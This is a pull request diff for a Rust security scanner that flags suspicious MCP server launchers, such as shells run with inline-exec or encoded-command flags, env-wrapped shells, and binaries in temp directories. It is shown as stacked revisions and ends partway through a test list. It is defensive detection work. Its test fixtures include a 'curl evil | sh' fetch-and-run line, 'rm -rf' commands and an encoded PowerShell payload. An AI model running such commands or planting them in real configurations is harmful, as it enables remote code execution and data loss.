### PR TITLE
feat(ai_guard): score MCP stdio launchers by attack shape (#127)

### DIFF
--- a/crates/sigil-agent/src/ai_guard/parser/mcp_scan.rs
+++ b/crates/sigil-agent/src/ai_guard/parser/mcp_scan.rs
@@ -6,7 +6,7 @@
 
 use crate::ai_guard::rubric;
 use serde_json::Value;
-use sigil_core::event::AiGuardReason;
+use sigil_core::event::{AiGuardReason, LauncherShape};
 
 /// Walk `settings.mcpServers` (object keyed by server name) and push reasons.
 pub fn emit_mcp_reasons(settings: &Value, out: &mut Vec<AiGuardReason>) {
@@ -46,16 +46,60 @@ pub(crate) fn emit_one_server(name: &str, def: &Value, out: &mut Vec<AiGuardReas
         out.push(AiGuardReason::NoSandbox {
             executor: "mcp_command".into(),
         });
-        if is_shell(command) {
-            if let Some(args) = def.get("args").and_then(Value::as_array) {
-                if let Some(snippet) = first_destructive_after_shell_flag(args) {
-                    if let Some(pat) = rubric::first_destructive_pattern(&snippet) {
-                        out.push(AiGuardReason::DestructiveInInlineCommand {
-                            pattern: pat.to_string(),
-                            hook_event: "mcp_command".into(),
-                            snippet: snippet.chars().take(80).collect(),
-                        });
-                    }
+        let args: &[Value] = def
+            .get("args")
+            .and_then(Value::as_array)
+            .map(Vec::as_slice)
+            .unwrap_or(&[]);
+        // #127 — attack-shape scoring. Both shapes evaluated independently;
+        // a launcher can emit both (e.g. `/tmp/.x/bash -c y`).
+        let (eff_cmd, eff_args) = effective_shell_target(command, args);
+        if is_shell(eff_cmd) {
+            if let Some(flag) = eff_args
+                .iter()
+                .filter_map(Value::as_str)
+                .find(|s| is_inline_exec_flag(s))
+            {
+                out.push(AiGuardReason::McpServerSuspiciousLauncher {
+                    server_name: name.to_string(),
+                    command: command.to_string(),
+                    shape: LauncherShape::Shell,
+                    evidence: format!(
+                        "{} {}",
+                        launcher_basename(eff_cmd),
+                        flag.to_ascii_lowercase()
+                    ),
+                });
+            }
+        }
+        // TransientPath — the raw `command` field itself plus every non-flag string arg
+        // (interpreter evasion: `node /tmp/payload.js`). `-flag=/tmp/x`
+        // forms are operator convention, skipped by design.
+        if let Some(hit) = std::iter::once(command)
+            .chain(
+                args.iter()
+                    .filter_map(Value::as_str)
+                    .filter(|s| !s.starts_with('-')),
+            )
+            .find(|s| is_transient_path(s))
+        {
+            out.push(AiGuardReason::McpServerSuspiciousLauncher {
+                server_name: name.to_string(),
+                command: command.to_string(),
+                shape: LauncherShape::TransientPath,
+                evidence: hit.to_string(),
+            });
+        }
+        // Destructive inline-arg scan — env-unwrapped so `env bash -c "rm…"`
+        // is assessed like `bash -c "rm…"` (shares is_shell hardening).
+        if is_shell(eff_cmd) {
+            if let Some(snippet) = first_destructive_after_shell_flag(eff_args) {
+                if let Some(pat) = rubric::first_destructive_pattern(&snippet) {
+                    out.push(AiGuardReason::DestructiveInInlineCommand {
+                        pattern: pat.to_string(),
+                        hook_event: "mcp_command".into(),
+                        snippet: snippet.chars().take(80).collect(),
+                    });
                 }
             }
         }
@@ -85,17 +129,18 @@ fn launcher_basename(cmd: &str) -> String {
     }
 }
 
+/// csh/tcsh quoting semantics differ from sh -c, but structurally `-c` still
+/// executes an inline body — same attack shape.
 fn is_shell(cmd: &str) -> bool {
     matches!(
         launcher_basename(cmd).as_str(),
-        "sh" | "bash" | "zsh" | "dash" | "cmd" | "powershell" | "pwsh"
+        "sh" | "bash" | "zsh" | "dash" | "ksh" | "csh" | "tcsh" | "fish" | "cmd" | "powershell" | "pwsh"
     )
 }
 
 /// #127 — inline-exec flags that make a shell launcher "config-as-code".
 /// `-EncodedCommand`/`-enc` payloads can't be content-scanned; the Shell
 /// shape itself is the structural answer to encoding evasion.
-#[allow(dead_code)] // #127 Task 3 wires these into emit_one_server
 fn is_inline_exec_flag(arg: &str) -> bool {
     matches!(
         arg.to_ascii_lowercase().as_str(),
@@ -106,7 +151,6 @@ fn is_inline_exec_flag(arg: &str) -> bool {
 /// #127 — `env`-wrapper unwrap: `/usr/bin/env bash -c …` is assessed as
 /// `bash -c …`. Skips `-flags` and `VAR=val` assignments after `env`;
 /// returns (effective command, args after it). Non-env passes through.
-#[allow(dead_code)] // #127 Task 3 wires these into emit_one_server
 fn effective_shell_target<'a>(command: &'a str, args: &'a [Value]) -> (&'a str, &'a [Value]) {
     if launcher_basename(command) != "env" {
         return (command, args);
@@ -122,7 +166,6 @@ fn effective_shell_target<'a>(command: &'a str, args: &'a [Value]) -> (&'a str, 
 }
 
 /// `FOO=bar`-shaped env assignment (POSIX env var name).
-#[allow(dead_code)] // #127 Task 3 wires these into emit_one_server
 fn is_env_assignment(s: &str) -> bool {
     let Some(eq) = s.find('=') else { return false };
     let name = &s[..eq];
@@ -138,7 +181,6 @@ fn is_env_assignment(s: &str) -> bool {
 /// (temp, cache, runtime-dir) — general dotdirs (`~/.cargo/bin` …), relative
 /// paths and bare names deliberately do NOT match (false-positive budget).
 /// Case-insensitive segment comparison defeats `/TMP/x`.
-#[allow(dead_code)] // #127 Task 3 wires these into emit_one_server
 fn is_transient_path(s: &str) -> bool {
     let segs: Vec<String> = s
         .split(['/', '\\'])
@@ -158,6 +200,7 @@ fn is_transient_path(s: &str) -> bool {
             &["private", "var", "tmp"],
             &["dev", "shm"],
             &["var", "folders"],
+            &["private", "var", "folders"],
             &["run", "user"],
             &["var", "run", "user"],
         ];
@@ -182,6 +225,7 @@ fn is_transient_path(s: &str) -> bool {
         &["windows", "temp"],
         &["appdata", "local", "temp"],
         &["%localappdata%", "temp"],
+        &["$env:localappdata", "temp"],
         &["library", "caches"],
     ];
     if SEQS.iter().any(|q| contains_seq(&segs, q)) {
@@ -197,12 +241,10 @@ fn is_transient_path(s: &str) -> bool {
 }
 
 /// segs strictly longer than prefix (something must follow the marker dir).
-#[allow(dead_code)] // #127 Task 3 wires these into emit_one_server
 fn starts_with_seq(segs: &[String], prefix: &[&str]) -> bool {
     segs.len() > prefix.len() && segs.iter().zip(prefix.iter()).all(|(a, b)| a == b)
 }
 
-#[allow(dead_code)] // #127 Task 3 wires these into emit_one_server
 fn contains_seq(segs: &[String], needle: &[&str]) -> bool {
     segs.len() >= needle.len()
         && segs
@@ -210,13 +252,15 @@ fn contains_seq(segs: &[String], needle: &[&str]) -> bool {
             .any(|w| w.iter().zip(needle.iter()).all(|(a, b)| a == b))
 }
 
-/// Returns the argument following a shell command flag (`-c`, `/c`, `/C`,
-/// `-Command`) — the inline script body.
+/// Returns the argument following a shell command flag (`-c`, `/c`, `-command`)
+/// — the inline script body. Flag match is case-insensitive (`-C`, `/C`,
+/// `-COMMAND` all match). Does NOT cover `-enc`/`-file` by design: the Shell
+/// shape handles those structurally; this scan only reads inline bodies.
 fn first_destructive_after_shell_flag(args: &[Value]) -> Option<String> {
     let mut iter = args.iter();
     while let Some(a) = iter.next() {
         let Some(s) = a.as_str() else { continue };
-        if matches!(s, "-c" | "/c" | "/C" | "-Command") {
+        if matches!(s.to_ascii_lowercase().as_str(), "-c" | "/c" | "-command") {
             if let Some(next) = iter.next().and_then(Value::as_str) {
                 return Some(next.to_string());
             }
@@ -319,10 +363,11 @@ mod tests {
         for s in [
             "bash", "BASH.EXE", "PwSh", "pwsh.exe", "/bin/zsh",
             r"C:\Windows\System32\cmd.exe", "PowerShell.EXE", "sh", "dash",
+            "ksh", "fish",
         ] {
             assert!(is_shell(s), "{s} should be a shell");
         }
-        for s in ["node", "npx", "python3.12", "bun", "uv", "bashful", "env", "fish"] {
+        for s in ["node", "npx", "python3.12", "bun", "uv", "bashful", "env"] {
             assert!(!is_shell(s), "{s} must NOT be a shell");
         }
     }
@@ -369,6 +414,8 @@ mod tests {
             r"$env:TEMP\x", r"%LOCALAPPDATA%\Temp\x",
             "~/.cache/x/payload", "/Users/u/.cache/x",
             "/Users/u/Library/Caches/x", "~/Library/Caches/x",
+            "/private/var/folders/ab/x",
+            r"$env:LOCALAPPDATA\Temp\x",
         ] {
             assert!(is_transient_path(s), "{s} should be transient");
         }
@@ -411,5 +458,150 @@ mod tests {
         assert!(out
             .iter()
             .any(|x| matches!(x, AiGuardReason::McpServerLocalCommand { .. })));
+    }
+
+    // ---- #127 emission -------------------------------------------------
+
+    fn suspicious(out: &[AiGuardReason]) -> Vec<(&LauncherShape, &str)> {
+        out.iter()
+            .filter_map(|r| match r {
+                AiGuardReason::McpServerSuspiciousLauncher { shape, evidence, .. } => {
+                    Some((shape, evidence.as_str()))
+                }
+                _ => None,
+            })
+            .collect()
+    }
+
+    #[test]
+    fn shell_with_exec_flag_emits_shell_shape() {
+        let mut out = Vec::new();
+        emit_one_server("a", &json!({"command":"bash","args":["-c","npx x"]}), &mut out);
+        let s = suspicious(&out);
+        assert_eq!(s.len(), 1);
+        assert_eq!(*s[0].0, LauncherShape::Shell);
+        assert_eq!(s[0].1, "bash -c");
+    }
+
+    #[test]
+    fn shell_without_exec_flag_stays_baseline() {
+        let mut out = Vec::new();
+        emit_one_server("a", &json!({"command":"bash","args":["server.sh"]}), &mut out);
+        assert!(suspicious(&out).is_empty());
+        // baseline still present
+        assert!(out.iter().any(|x| matches!(x, AiGuardReason::McpServerLocalCommand { .. })));
+    }
+
+    #[test]
+    fn env_wrapped_shell_detected() {
+        let mut out = Vec::new();
+        emit_one_server(
+            "a",
+            &json!({"command":"/usr/bin/env","args":["FOO=1","bash","-c","x"]}),
+            &mut out,
+        );
+        let s = suspicious(&out);
+        assert_eq!(s.len(), 1);
+        assert_eq!(*s[0].0, LauncherShape::Shell);
+        assert_eq!(s[0].1, "bash -c");
+    }
+
+    #[test]
+    fn encoded_command_flags_shell_shape() {
+        let mut out = Vec::new();
+        emit_one_server(
+            "a",
+            &json!({"command":"PwSh","args":["-EncodedCommand","cABhAHkA"]}),
+            &mut out,
+        );
+        let s = suspicious(&out);
+        assert_eq!(s.len(), 1);
+        assert_eq!(s[0].1, "pwsh -encodedcommand");
+    }
+
+    #[test]
+    fn transient_command_emits_transient_shape() {
+        let mut out = Vec::new();
+        emit_one_server("a", &json!({"command":"/tmp/.x/payload"}), &mut out);
+        let s = suspicious(&out);
+        assert_eq!(s.len(), 1);
+        assert_eq!(*s[0].0, LauncherShape::TransientPath);
+        assert_eq!(s[0].1, "/tmp/.x/payload");
+    }
+
+    #[test]
+    fn transient_via_interpreter_arg_detected() {
+        let mut out = Vec::new();
+        emit_one_server(
+            "a",
+            &json!({"command":"node","args":["/tmp/payload.js"]}),
+            &mut out,
+        );
+        let s = suspicious(&out);
+        assert_eq!(s.len(), 1);
+        assert_eq!(*s[0].0, LauncherShape::TransientPath);
+        assert_eq!(s[0].1, "/tmp/payload.js");
+    }
+
+    #[test]
+    fn flag_embedded_path_arg_not_scanned() {
+        let mut out = Vec::new();
+        emit_one_server(
+            "a",
+            &json!({"command":"npx","args":["--cache-dir=/tmp/x","server"]}),
+            &mut out,
+        );
+        assert!(suspicious(&out).is_empty());
+    }
+
+    #[test]
+    fn dual_shape_emits_two_reasons() {
+        let mut out = Vec::new();
+        emit_one_server(
+            "a",
+            &json!({"command":"/tmp/.x/bash","args":["-c","y"]}),
+            &mut out,
+        );
+        let s = suspicious(&out);
+        assert_eq!(s.len(), 2);
+        assert!(s.iter().any(|(sh, ev)| **sh == LauncherShape::Shell && *ev == "bash -c"));
+        assert!(s.iter().any(|(sh, ev)| **sh == LauncherShape::TransientPath && *ev == "/tmp/.x/bash"));
+    }
+
+    #[test]
+    fn benign_stdio_unchanged() {
+        let mut out = Vec::new();
+        emit_one_server(
+            "a",
+            &json!({"command":"npx","args":["@modelcontextprotocol/server-foo"]}),
+            &mut out,
+        );
+        assert!(suspicious(&out).is_empty());
+        assert_eq!(out.len(), 2); // McpServerLocalCommand + NoSandbox only — update if the baseline grows
+    }
+
+    #[test]
+    fn destructive_flag_now_case_insensitive() {
+        let mut out = Vec::new();
+        emit_one_server(
+            "a",
+            &json!({"command":"BASH.EXE","args":["-C","rm -rf /tmp/sigil-test"]}),
+            &mut out,
+        );
+        assert!(out.iter().any(|x| matches!(
+            x,
+            AiGuardReason::DestructiveInInlineCommand { hook_event, .. } if hook_event == "mcp_command"
+        )));
+    }
+
+    #[test]
+    fn env_wrapped_destructive_detected() {
+        let mut out = Vec::new();
+        emit_one_server(
+            "a",
+            &json!({"command":"/usr/bin/env","args":["bash","-c","rm -rf /tmp/sigil-test"]}),
+            &mut out,
+        );
+        assert!(out.iter().any(|x| matches!(x, AiGuardReason::DestructiveInInlineCommand { .. })));
     }
 }

--- a/crates/sigil-agent/src/ai_guard/parser/mcp_scan.rs
+++ b/crates/sigil-agent/src/ai_guard/parser/mcp_scan.rs
@@ -134,18 +134,44 @@ fn launcher_basename(cmd: &str) -> String {
 fn is_shell(cmd: &str) -> bool {
     matches!(
         launcher_basename(cmd).as_str(),
-        "sh" | "bash" | "zsh" | "dash" | "ksh" | "csh" | "tcsh" | "fish" | "cmd" | "powershell" | "pwsh"
+        "sh" | "bash"
+            | "zsh"
+            | "dash"
+            | "ksh"
+            | "csh"
+            | "tcsh"
+            | "fish"
+            | "cmd"
+            | "powershell"
+            | "pwsh"
     )
+}
+
+/// #127 — POSIX shell bundled short-option group that includes `c`
+/// (`-c`, `-lc`, `-ic`, `-xc` …). A POSIX shell parses `-lc` as bundled
+/// single-char flags where `c` still takes the next arg as the command
+/// body, so it is the same config-as-code shape as `-c`. Single dash only
+/// (not `--long`), ASCII-alphabetic body, must contain `c`.
+fn is_posix_bundled_exec_flag(arg: &str) -> bool {
+    let Some(body) = arg.strip_prefix('-') else {
+        return false;
+    };
+    !body.is_empty()
+        && !body.starts_with('-')                 // exclude --long
+        && body.chars().all(|c| c.is_ascii_alphabetic())
+        && body.contains('c')
 }
 
 /// #127 — inline-exec flags that make a shell launcher "config-as-code".
 /// `-EncodedCommand`/`-enc` payloads can't be content-scanned; the Shell
-/// shape itself is the structural answer to encoding evasion.
+/// shape itself is the structural answer to encoding evasion. The POSIX
+/// bundle branch also catches `-lc`/`-ic`/`-xc` (bundled short options).
 fn is_inline_exec_flag(arg: &str) -> bool {
+    let lower = arg.to_ascii_lowercase();
     matches!(
-        arg.to_ascii_lowercase().as_str(),
+        lower.as_str(),
         "-c" | "/c" | "/k" | "-command" | "-encodedcommand" | "-enc" | "-file"
-    )
+    ) || is_posix_bundled_exec_flag(&lower)
 }
 
 /// #127 — `env`-wrapper unwrap: `/usr/bin/env bash -c …` is assessed as
@@ -260,7 +286,8 @@ fn first_destructive_after_shell_flag(args: &[Value]) -> Option<String> {
     let mut iter = args.iter();
     while let Some(a) = iter.next() {
         let Some(s) = a.as_str() else { continue };
-        if matches!(s.to_ascii_lowercase().as_str(), "-c" | "/c" | "-command") {
+        let low = s.to_ascii_lowercase();
+        if matches!(low.as_str(), "-c" | "/c" | "-command") || is_posix_bundled_exec_flag(&low) {
             if let Some(next) = iter.next().and_then(Value::as_str) {
                 return Some(next.to_string());
             }
@@ -361,9 +388,17 @@ mod tests {
     #[test]
     fn is_shell_normalizes_case_and_exe_suffix() {
         for s in [
-            "bash", "BASH.EXE", "PwSh", "pwsh.exe", "/bin/zsh",
-            r"C:\Windows\System32\cmd.exe", "PowerShell.EXE", "sh", "dash",
-            "ksh", "fish",
+            "bash",
+            "BASH.EXE",
+            "PwSh",
+            "pwsh.exe",
+            "/bin/zsh",
+            r"C:\Windows\System32\cmd.exe",
+            "PowerShell.EXE",
+            "sh",
+            "dash",
+            "ksh",
+            "fish",
         ] {
             assert!(is_shell(s), "{s} should be a shell");
         }
@@ -374,7 +409,18 @@ mod tests {
 
     #[test]
     fn inline_exec_flags_case_insensitive() {
-        for s in ["-c", "/c", "/K", "-Command", "-EncodedCommand", "-enc", "-File"] {
+        for s in [
+            "-c",
+            "/c",
+            "/K",
+            "-Command",
+            "-EncodedCommand",
+            "-enc",
+            "-File",
+            "-lc",
+            "-ic",
+            "-xc",
+        ] {
             assert!(is_inline_exec_flag(s), "{s}");
         }
         for s in ["-l", "--login", "server.sh", "-e", "/x"] {
@@ -384,7 +430,13 @@ mod tests {
 
     #[test]
     fn env_wrapper_unwraps_to_real_target() {
-        let args = vec![json!("-S"), json!("FOO=1"), json!("bash"), json!("-c"), json!("x")];
+        let args = vec![
+            json!("-S"),
+            json!("FOO=1"),
+            json!("bash"),
+            json!("-c"),
+            json!("x"),
+        ];
         let (cmd, rest) = effective_shell_target("/usr/bin/env", &args);
         assert_eq!(cmd, "bash");
         assert_eq!(rest.len(), 2); // ["-c", "x"]
@@ -404,16 +456,31 @@ mod tests {
     #[test]
     fn transient_path_positive_list() {
         for s in [
-            "/tmp/payload", "/tmp/python3", "/TMP/x", "/tmp/.x/bash",
-            "/private/tmp/a", "/var/tmp/a", "/private/var/tmp/a",
-            "/dev/shm/a", "/var/folders/ab/x", "/run/user/1000/x",
+            "/tmp/payload",
+            "/tmp/python3",
+            "/TMP/x",
+            "/tmp/.x/bash",
+            "/private/tmp/a",
+            "/var/tmp/a",
+            "/private/var/tmp/a",
+            "/dev/shm/a",
+            "/var/folders/ab/x",
+            "/run/user/1000/x",
             "/var/run/user/1000/x",
-            r"C:\Users\u\AppData\Local\Temp\x.exe", r"C:\Windows\Temp\x.exe",
-            r"C:\Temp\x.exe", r"D:\tmp\x.exe",
-            r"%TEMP%\x.exe", r"%TMP%\x", "$TMPDIR/x", "${TMPDIR}/x",
-            r"$env:TEMP\x", r"%LOCALAPPDATA%\Temp\x",
-            "~/.cache/x/payload", "/Users/u/.cache/x",
-            "/Users/u/Library/Caches/x", "~/Library/Caches/x",
+            r"C:\Users\u\AppData\Local\Temp\x.exe",
+            r"C:\Windows\Temp\x.exe",
+            r"C:\Temp\x.exe",
+            r"D:\tmp\x.exe",
+            r"%TEMP%\x.exe",
+            r"%TMP%\x",
+            "$TMPDIR/x",
+            "${TMPDIR}/x",
+            r"$env:TEMP\x",
+            r"%LOCALAPPDATA%\Temp\x",
+            "~/.cache/x/payload",
+            "/Users/u/.cache/x",
+            "/Users/u/Library/Caches/x",
+            "~/Library/Caches/x",
             "/private/var/folders/ab/x",
             r"$env:LOCALAPPDATA\Temp\x",
         ] {
@@ -424,15 +491,22 @@ mod tests {
     #[test]
     fn transient_path_negative_list() {
         for s in [
-            "npx", "bun", "uv", "node", "python3.12",          // bare names
-            "/usr/bin/env", "/usr/local/bin/node",             // normal abs
-            "~/.cargo/bin/my-tool", "~/.local/bin/uvx",        // toolchain dotdirs
+            "npx",
+            "bun",
+            "uv",
+            "node",
+            "python3.12", // bare names
+            "/usr/bin/env",
+            "/usr/local/bin/node", // normal abs
+            "~/.cargo/bin/my-tool",
+            "~/.local/bin/uvx", // toolchain dotdirs
             "~/.nvm/versions/node/v22/bin/node",
-            "./target/debug/my-mcp-server", "a/b",             // relative
-            "node_modules/.bin/server",                        // .bin != .cache
-            "~/tmp/x",                                         // non-standard personal temp
-            "/tmp",                                            // dir itself, no file
-            "/tmpfoo/x",                                       // segment mismatch
+            "./target/debug/my-mcp-server",
+            "a/b",                      // relative
+            "node_modules/.bin/server", // .bin != .cache
+            "~/tmp/x",                  // non-standard personal temp
+            "/tmp",                     // dir itself, no file
+            "/tmpfoo/x",                // segment mismatch
         ] {
             assert!(!is_transient_path(s), "{s} must NOT be transient");
         }
@@ -465,9 +539,9 @@ mod tests {
     fn suspicious(out: &[AiGuardReason]) -> Vec<(&LauncherShape, &str)> {
         out.iter()
             .filter_map(|r| match r {
-                AiGuardReason::McpServerSuspiciousLauncher { shape, evidence, .. } => {
-                    Some((shape, evidence.as_str()))
-                }
+                AiGuardReason::McpServerSuspiciousLauncher {
+                    shape, evidence, ..
+                } => Some((shape, evidence.as_str())),
                 _ => None,
             })
             .collect()
@@ -476,7 +550,11 @@ mod tests {
     #[test]
     fn shell_with_exec_flag_emits_shell_shape() {
         let mut out = Vec::new();
-        emit_one_server("a", &json!({"command":"bash","args":["-c","npx x"]}), &mut out);
+        emit_one_server(
+            "a",
+            &json!({"command":"bash","args":["-c","npx x"]}),
+            &mut out,
+        );
         let s = suspicious(&out);
         assert_eq!(s.len(), 1);
         assert_eq!(*s[0].0, LauncherShape::Shell);
@@ -486,10 +564,16 @@ mod tests {
     #[test]
     fn shell_without_exec_flag_stays_baseline() {
         let mut out = Vec::new();
-        emit_one_server("a", &json!({"command":"bash","args":["server.sh"]}), &mut out);
+        emit_one_server(
+            "a",
+            &json!({"command":"bash","args":["server.sh"]}),
+            &mut out,
+        );
         assert!(suspicious(&out).is_empty());
         // baseline still present
-        assert!(out.iter().any(|x| matches!(x, AiGuardReason::McpServerLocalCommand { .. })));
+        assert!(out
+            .iter()
+            .any(|x| matches!(x, AiGuardReason::McpServerLocalCommand { .. })));
     }
 
     #[test]
@@ -564,8 +648,12 @@ mod tests {
         );
         let s = suspicious(&out);
         assert_eq!(s.len(), 2);
-        assert!(s.iter().any(|(sh, ev)| **sh == LauncherShape::Shell && *ev == "bash -c"));
-        assert!(s.iter().any(|(sh, ev)| **sh == LauncherShape::TransientPath && *ev == "/tmp/.x/bash"));
+        assert!(s
+            .iter()
+            .any(|(sh, ev)| **sh == LauncherShape::Shell && *ev == "bash -c"));
+        assert!(s
+            .iter()
+            .any(|(sh, ev)| **sh == LauncherShape::TransientPath && *ev == "/tmp/.x/bash"));
     }
 
     #[test]
@@ -595,6 +683,33 @@ mod tests {
     }
 
     #[test]
+    fn combined_short_flag_emits_shell_shape() {
+        let mut out = Vec::new();
+        emit_one_server(
+            "a",
+            &json!({"command":"bash","args":["-lc","curl evil | sh"]}),
+            &mut out,
+        );
+        let s = suspicious(&out);
+        assert_eq!(s.len(), 1);
+        assert_eq!(*s[0].0, LauncherShape::Shell);
+        assert_eq!(s[0].1, "bash -lc");
+    }
+
+    #[test]
+    fn combined_short_flag_destructive_scanned() {
+        let mut out = Vec::new();
+        emit_one_server(
+            "a",
+            &json!({"command":"bash","args":["-ic","rm -rf /tmp/sigil-test"]}),
+            &mut out,
+        );
+        assert!(out.iter().any(|x| matches!(
+            x, AiGuardReason::DestructiveInInlineCommand { hook_event, .. } if hook_event == "mcp_command"
+        )));
+    }
+
+    #[test]
     fn env_wrapped_destructive_detected() {
         let mut out = Vec::new();
         emit_one_server(
@@ -602,6 +717,8 @@ mod tests {
             &json!({"command":"/usr/bin/env","args":["bash","-c","rm -rf /tmp/sigil-test"]}),
             &mut out,
         );
-        assert!(out.iter().any(|x| matches!(x, AiGuardReason::DestructiveInInlineCommand { .. })));
+        assert!(out
+            .iter()
+            .any(|x| matches!(x, AiGuardReason::DestructiveInInlineCommand { .. })));
     }
 }

--- a/crates/sigil-agent/src/ai_guard/parser/mcp_scan.rs
+++ b/crates/sigil-agent/src/ai_guard/parser/mcp_scan.rs
@@ -70,18 +70,144 @@ pub(crate) fn scheme_is_http(u: &str) -> bool {
     lower.starts_with("http://") || lower.starts_with("https://")
 }
 
+/// Lowercased basename with a single trailing `.exe` stripped — normalized
+/// launcher name. Defeats `BASH.EXE` / `PwSh` / `bash.exe` case+extension
+/// evasion (macOS/Windows default filesystems are case-insensitive).
+fn launcher_basename(cmd: &str) -> String {
+    let base = cmd
+        .rsplit(['/', '\\'])
+        .next()
+        .unwrap_or(cmd)
+        .to_ascii_lowercase();
+    match base.strip_suffix(".exe") {
+        Some(stripped) => stripped.to_string(),
+        None => base,
+    }
+}
+
 fn is_shell(cmd: &str) -> bool {
     matches!(
-        cmd.rsplit(['/', '\\']).next().unwrap_or(cmd),
-        "sh" | "bash"
-            | "zsh"
-            | "dash"
-            | "cmd"
-            | "cmd.exe"
-            | "powershell"
-            | "powershell.exe"
-            | "pwsh"
+        launcher_basename(cmd).as_str(),
+        "sh" | "bash" | "zsh" | "dash" | "cmd" | "powershell" | "pwsh"
     )
+}
+
+/// #127 — inline-exec flags that make a shell launcher "config-as-code".
+/// `-EncodedCommand`/`-enc` payloads can't be content-scanned; the Shell
+/// shape itself is the structural answer to encoding evasion.
+#[allow(dead_code)] // #127 Task 3 wires these into emit_one_server
+fn is_inline_exec_flag(arg: &str) -> bool {
+    matches!(
+        arg.to_ascii_lowercase().as_str(),
+        "-c" | "/c" | "/k" | "-command" | "-encodedcommand" | "-enc" | "-file"
+    )
+}
+
+/// #127 — `env`-wrapper unwrap: `/usr/bin/env bash -c …` is assessed as
+/// `bash -c …`. Skips `-flags` and `VAR=val` assignments after `env`;
+/// returns (effective command, args after it). Non-env passes through.
+#[allow(dead_code)] // #127 Task 3 wires these into emit_one_server
+fn effective_shell_target<'a>(command: &'a str, args: &'a [Value]) -> (&'a str, &'a [Value]) {
+    if launcher_basename(command) != "env" {
+        return (command, args);
+    }
+    for (i, a) in args.iter().enumerate() {
+        let Some(s) = a.as_str() else { continue };
+        if s.starts_with('-') || is_env_assignment(s) {
+            continue;
+        }
+        return (s, &args[i + 1..]);
+    }
+    (command, args)
+}
+
+/// `FOO=bar`-shaped env assignment (POSIX env var name).
+#[allow(dead_code)] // #127 Task 3 wires these into emit_one_server
+fn is_env_assignment(s: &str) -> bool {
+    let Some(eq) = s.find('=') else { return false };
+    let name = &s[..eq];
+    !name.is_empty()
+        && name
+            .chars()
+            .next()
+            .is_some_and(|c| c.is_ascii_alphabetic() || c == '_')
+        && name.chars().all(|c| c.is_ascii_alphanumeric() || c == '_')
+}
+
+/// #127 — transient/attacker-writable launch location. Narrow positive list
+/// (temp, cache, runtime-dir) — general dotdirs (`~/.cargo/bin` …), relative
+/// paths and bare names deliberately do NOT match (false-positive budget).
+/// Case-insensitive segment comparison defeats `/TMP/x`.
+#[allow(dead_code)] // #127 Task 3 wires these into emit_one_server
+fn is_transient_path(s: &str) -> bool {
+    let segs: Vec<String> = s
+        .split(['/', '\\'])
+        .filter(|p| !p.is_empty())
+        .map(str::to_ascii_lowercase)
+        .collect();
+    // A launcher needs at least <marker>/<file>.
+    if segs.len() < 2 {
+        return false;
+    }
+    // POSIX temp/runtime roots — absolute paths only.
+    if s.starts_with('/') {
+        const ROOTS: &[&[&str]] = &[
+            &["tmp"],
+            &["private", "tmp"],
+            &["var", "tmp"],
+            &["private", "var", "tmp"],
+            &["dev", "shm"],
+            &["var", "folders"],
+            &["run", "user"],
+            &["var", "run", "user"],
+        ];
+        if ROOTS.iter().any(|r| starts_with_seq(&segs, r)) {
+            return true;
+        }
+    }
+    // Windows drive-root temp: C:\Temp\x, D:\tmp\x.
+    if segs.len() > 2
+        && segs[0].len() == 2
+        && segs[0].ends_with(':')
+        && segs[0]
+            .chars()
+            .next()
+            .is_some_and(|c| c.is_ascii_alphabetic())
+        && matches!(segs[1].as_str(), "temp" | "tmp")
+    {
+        return true;
+    }
+    // Marker sequences anywhere in the path.
+    const SEQS: &[&[&str]] = &[
+        &["windows", "temp"],
+        &["appdata", "local", "temp"],
+        &["%localappdata%", "temp"],
+        &["library", "caches"],
+    ];
+    if SEQS.iter().any(|q| contains_seq(&segs, q)) {
+        return true;
+    }
+    // Single-segment markers (cache dir, unexpanded env temp references).
+    segs.iter().any(|p| {
+        matches!(
+            p.as_str(),
+            ".cache" | "%temp%" | "%tmp%" | "$tmpdir" | "${tmpdir}" | "$env:temp" | "$env:tmp"
+        )
+    })
+}
+
+/// segs strictly longer than prefix (something must follow the marker dir).
+#[allow(dead_code)] // #127 Task 3 wires these into emit_one_server
+fn starts_with_seq(segs: &[String], prefix: &[&str]) -> bool {
+    segs.len() > prefix.len() && segs.iter().zip(prefix.iter()).all(|(a, b)| a == b)
+}
+
+#[allow(dead_code)] // #127 Task 3 wires these into emit_one_server
+fn contains_seq(segs: &[String], needle: &[&str]) -> bool {
+    segs.len() >= needle.len()
+        && segs
+            .windows(needle.len())
+            .any(|w| w.iter().zip(needle.iter()).all(|(a, b)| a == b))
 }
 
 /// Returns the argument following a shell command flag (`-c`, `/c`, `/C`,
@@ -184,6 +310,85 @@ mod tests {
         assert!(!r
             .iter()
             .any(|x| matches!(x, AiGuardReason::DestructiveInInlineCommand { .. })));
+    }
+
+    // ---- #127 helpers --------------------------------------------------
+
+    #[test]
+    fn is_shell_normalizes_case_and_exe_suffix() {
+        for s in [
+            "bash", "BASH.EXE", "PwSh", "pwsh.exe", "/bin/zsh",
+            r"C:\Windows\System32\cmd.exe", "PowerShell.EXE", "sh", "dash",
+        ] {
+            assert!(is_shell(s), "{s} should be a shell");
+        }
+        for s in ["node", "npx", "python3.12", "bun", "uv", "bashful", "env", "fish"] {
+            assert!(!is_shell(s), "{s} must NOT be a shell");
+        }
+    }
+
+    #[test]
+    fn inline_exec_flags_case_insensitive() {
+        for s in ["-c", "/c", "/K", "-Command", "-EncodedCommand", "-enc", "-File"] {
+            assert!(is_inline_exec_flag(s), "{s}");
+        }
+        for s in ["-l", "--login", "server.sh", "-e", "/x"] {
+            assert!(!is_inline_exec_flag(s), "{s}");
+        }
+    }
+
+    #[test]
+    fn env_wrapper_unwraps_to_real_target() {
+        let args = vec![json!("-S"), json!("FOO=1"), json!("bash"), json!("-c"), json!("x")];
+        let (cmd, rest) = effective_shell_target("/usr/bin/env", &args);
+        assert_eq!(cmd, "bash");
+        assert_eq!(rest.len(), 2); // ["-c", "x"]
+
+        // non-env passes through untouched
+        let args2 = vec![json!("-c")];
+        let (cmd2, rest2) = effective_shell_target("bash", &args2);
+        assert_eq!(cmd2, "bash");
+        assert_eq!(rest2.len(), 1);
+
+        // env with nothing usable falls back to itself
+        let args3 = vec![json!("-i")];
+        let (cmd3, _) = effective_shell_target("env", &args3);
+        assert_eq!(cmd3, "env");
+    }
+
+    #[test]
+    fn transient_path_positive_list() {
+        for s in [
+            "/tmp/payload", "/tmp/python3", "/TMP/x", "/tmp/.x/bash",
+            "/private/tmp/a", "/var/tmp/a", "/private/var/tmp/a",
+            "/dev/shm/a", "/var/folders/ab/x", "/run/user/1000/x",
+            "/var/run/user/1000/x",
